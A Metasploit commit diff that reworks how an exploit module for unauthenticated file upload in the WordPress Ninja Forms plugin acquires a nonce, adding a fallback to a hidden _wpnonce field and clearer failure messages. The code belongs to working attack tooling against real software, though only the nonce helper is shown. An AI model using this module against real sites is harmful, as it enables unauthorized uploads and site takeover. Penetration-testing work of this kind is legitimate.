Land rapid7#7042, fetch_ninja_form_nonce/wponce fix

wvu · wvu · commit b2c3267a2aa5 · 2016-07-13T11:38:11.000-05:00
diff --git a/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb b/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb
@@ -105,8 +105,19 @@ def fetch_ninja_form_nonce
       'uri'    => uri
     )
 
-    fail_with Failure::UnexpectedReply, 'Failed to acquire a nonce' unless res && res.code == 200
-    res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1]
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "Unable to access FORM_PATH: #{datastore['FORM_PATH']}")
+    end
+
+    form_wpnonce = res.get_hidden_inputs.first['_wpnonce']
+
+    nonce = res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] || form_wpnonce
+
+    unless nonce
+      fail_with(Failure::Unknown, 'Cannot find wpnonce or ajaxNonce from FORM_PATH')
+    end
+
+    nonce
   end
 
   def upload_payload(data)
